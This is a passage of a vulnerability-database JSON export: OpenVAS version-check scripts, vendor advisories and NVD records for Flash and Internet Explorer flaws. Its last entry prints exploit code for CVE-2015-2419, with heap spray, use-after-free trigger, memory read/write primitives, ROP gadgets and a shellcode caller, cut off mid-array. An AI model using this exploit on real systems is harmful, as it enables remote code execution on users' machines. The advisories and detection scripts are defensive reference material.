in NSS,\n\n - The memory corruption when drawing Skia content,\n\n - The addressbar spoofing during scrolling with editable content on Firefox for Android,\n\n - The HTML injection into RSS Reader feed preview page through TITLE element,\n\n - The drag and drop of javascript: URLs can allow for self-XSS,\n\n - An incorrect ownership model for Private Browsing information and\n\n - The memory safety bugs fixed in Firefox 53 and Firefox ESR 52.1.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code, to delete arbitrary files by leveraging\n certain local file execution, to obtain sensitive information, and to cause\n a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version before 53.0 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 53.0\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2017-10\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_portable_win.nasl\");\n script_mandatory_keys(\"Firefox/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:ffVer, test_version:\"53.0\"))\n{\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"53.0\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-17T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player 
(SUSE-SU-2016:1305-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1102", "CVE-2016-1026", "CVE-2016-1098", "CVE-2016-1021", "CVE-2016-4108", "CVE-2016-1019", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-1018", "CVE-2016-4117", "CVE-2016-1013", "CVE-2016-4116", "CVE-2016-1006", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-1023", "CVE-2016-4113", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-4112", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1106", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-1025", "CVE-2016-4115", "CVE-2016-1016", "CVE-2016-1105", "CVE-2016-1099", "CVE-2016-1015"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851312", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851312", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851312\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-17 13:40:35 +0200 (Tue, 17 May 2016)\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\",\n \"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2016:1305-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.621 (bsc#979422):\n\n * APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097, CVE-2016-1098,\n CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102,\n CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110,\n CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111,\n CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115,\n CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous release, but got\n published afterwards:\n\n * APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012,\n CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016,\n CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024,\n CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:1305-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n 
if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.621~130.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.621~130.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:38:44", "description": "A remote code execution vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an error in Adobe Flash Player while handling a specially crafted SWF file. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-06T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Remote Code Execution (APSA16-01: CVE-2016-1019)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019"], 
"modified": "2017-10-03T00:00:00", "id": "CPAI-2016-0264", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:44:29", "description": "A remote code execution vulnerability exists in the way that the JScript engine, when rendered in Internet Explorer, handles objects in memory. A remote attacker can exploit this issue by enticing a user to open a specially crafted web-page with an affected version of Internet Explorer.", "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Jscript9 Memory Corruption (MS15-065: CVE-2015-2419)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2021-09-01T00:00:00", "id": "CPAI-2015-0843", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T07:39:40", "description": "A remote code execution vulnerability exists in the way that the JScript engine, when rendered in Internet Explorer, handles objects in memory. 
A remote attacker can exploit this issue by enticing a user to open a specially crafted web-page with an affected version of Internet Explorer.", "cvss3": {}, "published": "2020-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Memory Corruption (CVE-2015-2419)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2020-09-21T00:00:00", "id": "CPAI-2015-1058", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:47:32", "description": "Adobe Flash Player 21.0.0.197 and earlier allows remote attackers to cause\na denial of service (application crash) or possibly execute arbitrary code\nvia unspecified vectors, as exploited in the wild in April 2016.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-07T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019"], "modified": "2016-04-07T00:00:00", "id": "UB:CVE-2016-1019", "href": "https://ubuntu.com/security/CVE-2016-1019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:08:48", "description": "Adobe Flash Player 21.0.0.197 and earlier allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors, as exploited in the wild in April 2016.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-07T10:59:00", "type": "cve", "title": "CVE-2016-1019", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019"], "modified": "2018-10-12T22:11:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.228", 
"cpe:/a:adobe:flash_player:20.0.0.306", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:21.0.0.97", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:18.0.0.333", "cpe:/a:adobe:flash_player:11.2.202.577", "cpe:/a:adobe:flash_player:19.0.0.185", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:20.0.0.235"], "id": "CVE-2016-1019", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:edge:*:*", "cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:internet_explorer:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:chrome:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:18.0.0.333:*:*:*:esr:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.577:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.306:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:13:15", "description": "JScript 9 in Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"JScript9 Memory Corruption Vulnerability.\"", "cvss3": {}, "published": "2015-07-14T21:59:00", "type": "cve", "title": "CVE-2015-2419", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2018-10-12T22:09:00", "cpe": ["cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:11"], "id": "CVE-2015-2419", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2419", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:11:-:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:07:58", "description": "Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code by overriding NetConnection object properties to leverage an unspecified \"type confusion,\" a different vulnerability than CVE-2016-1019.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-04-09T01:59:00", "type": "cve", "title": "CVE-2016-1015", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1015", "CVE-2016-1019"], "modified": "2018-10-12T22:11:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:20.0.0.306", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:21.0.0.97", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:18.0.0.333", "cpe:/a:adobe:flash_player:11.2.202.577", "cpe:/a:adobe:flash_player:19.0.0.185", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:20.0.0.235"], "id": "CVE-2016-1015", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1015", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:edge:*:*", "cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:internet_explorer:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:chrome:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:18.0.0.333:*:*:*:esr:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.577:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.306:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2021-06-08T18:48:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. 
Failed attacks may cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Avaya CallPilot 4.0 \n * Avaya CallPilot 4.0.1 \n * Avaya CallPilot 5.0 \n * Avaya CallPilot 5.0.1 \n * Avaya CallPilot 5.1.0 \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server 5.0 \n * Avaya Messaging Application Server 5.0.1 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. 
Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2015-2419 JScript9 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-2419"], "modified": "2015-07-14T00:00:00", "id": "SMNTC-75661", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/75661", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-05-24T18:03:27", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2018-05-24T00:00:00", "type": "zdt", "title": "Microsoft Internet Explorer 11 #InternetExplorer #IE - javascript Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2419"], "modified": "2018-05-24T00:00:00", "id": "1337DAY-ID-30433", "href": "https://0day.today/exploit/description/30433", "sourceData": "<html>\r\n<body>\r\n<script>\r\nARR_SIZE = 3248;\r\nfirst_gadget_offsets = [150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596,180980,226276,179716,320389,175621,307381,792144,183476];\r\nstackpivot_gadget_offsets = [122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265,163058,170761,258290,166489,245298,172955,82542];\r\nfirst_gadget = [0x89, 0x41, 0x0c, 0xc3];\r\nstackpivot_gadget = [0x94, 0xc3];\r\ngadget_offsets = 
{\"stackpivot\": 0, \"g1\": 0, \"g2\": 0};\r\n \r\nfunction empty_replacer(a,b) {\r\n return b;\r\n}\r\n \r\nfunction create_list(lst, depth) {\r\n if (depth > 5)\r\n {\r\n return;\r\n }\r\n else\r\n {\r\n // Creates 19 objects in each nested list\r\n for (i = 0; i <= 19; i++)\r\n {\r\n // Create random string with length 8\r\n for (var val = \"\", c = 0; c <= 8; c++) {\r\n rnd = Math.floor((Math.random() * 90) + 48);\r\n l = String.fromCharCode(rnd);\r\n val = val + l;\r\n }\r\n lst[\"a\" + i] = val;\r\n }\r\n create_list(lst[\"a0\"] = {}, depth + 1);\r\n }\r\n}\r\n \r\nfunction create_triggering_json() {\r\n var lst = {}\r\n create_list(lst, 0);\r\n return lst;\r\n}\r\n \r\n// Create vulnerable JSON\r\ntrig_json = create_triggering_json();\r\n \r\nspray = new Array(4096);\r\nbuff = new ArrayBuffer(4);\r\nsize = 0;\r\n \r\n// Heap Spray\r\nvar I = setInterval(function(){ \r\n for (i=0;i<400;i++,size++) {\r\n spray[size] = new Array(15352);\r\n for (j = 0; j< 85;j++) {\r\n spray[size][j] = new Uint32Array(buff);\r\n }\r\n 0 == i && (yb = spray[0][0][\"length\"], yb[\"toString\"](16))\r\n }\r\n \r\n size >= (4096) && (clearInterval(I), uaf()) \r\n}, 100);\r\n \r\nvar arr = []\r\nfunction uaf()\r\n{\r\n JSON.stringify(trig_json,empty_replacer);\r\n \r\n var pattern = [311357464,311357472,311357464]; \r\n for (var b = 3248 * 2, c = 203; c < b; c++)\r\n arr[c] = new ArrayBuffer(12);\r\n \r\n for (c = 203; c < b; c++)\r\n {\r\n var data = new Uint32Array(arr[c],0);\r\n a = 0;\r\n for (var i = data[\"length\"] / pattern[\"length\"]; a < i; a++)\r\n for (var d=0, e = pattern[\"length\"]; d < e;d++) \r\n data[a+d] = pattern[d];\r\n \r\n }\r\n \r\n CollectGarbage();\r\n \r\n search_corrupted_array();\r\n}\r\n \r\nvar damaged_array;\r\nfunction search_corrupted_array()\r\n{\r\n for (i=0;i<4096;i++) \r\n {\r\n for (j = 0; j< 85;j++) {\r\n if (spray[i][j].length != 1)\r\n {\r\n damaged_array = spray[i][j];\r\n damaged_array[1] = 0x7fffffff; // Set array to include almost 
entire user-space\r\n damaged_array[2] = 0x10000;\r\n \r\n write_dword_to_addr(damaged_array, 0x128e0020, 0xDEC0DE * 2 | 1); // Mark the first element of one of the arrays, to find it later\r\n for (k = 0; k < 4096; k++) { // find the marked array\r\n if (spray[k][0] == 0xDEC0DE) {\r\n break;\r\n }\r\n }\r\n // now spray[k][0] is 0x128e0020\r\n if (k == 4096) break;\r\n spray[k][2] = new Array(1); // creates a native integer array, pointed by 0x128e0028\r\n spray[k][2][0] = new ArrayBuffer(0xc); // turns the array to be JavascriptArray\r\n arr_obj = read_dword_from_addr(damaged_array, 0x128e0028); // address of the new JavascriptArray object\r\n jscript9_base_addr = read_dword_from_addr(damaged_array, arr_obj) & 0xffff0000; // read the first dword of the JavascriptArray object, which is the vftable pointer, null the lower word to get jscript9 base address\r\n vp_addr = get_vp_addr(damaged_array, jscript9_base_addr); // virtual address of kernel32!VirtualProtectStub\r\n if (vp_addr == 0) break;\r\n arrbuf = new ArrayBuffer(0x5000); // this buffer will contain the ROP chain\r\n spray[k][0] = new Uint32Array(arrbuf); // Uint32Array that is a view to the arraybuffer above, pointed by 0x128e0020\r\n rc_buf_ui32_obj = read_dword_from_addr(damaged_array, 0x128e0020); // address of the Uint32Array object\r\n rc_buf_ui32_data = read_dword_from_addr(damaged_array, rc_buf_ui32_obj + 0x20); // address of first element of Uint32Array above\r\n var shellcode_caller = [0x53, 0x55, 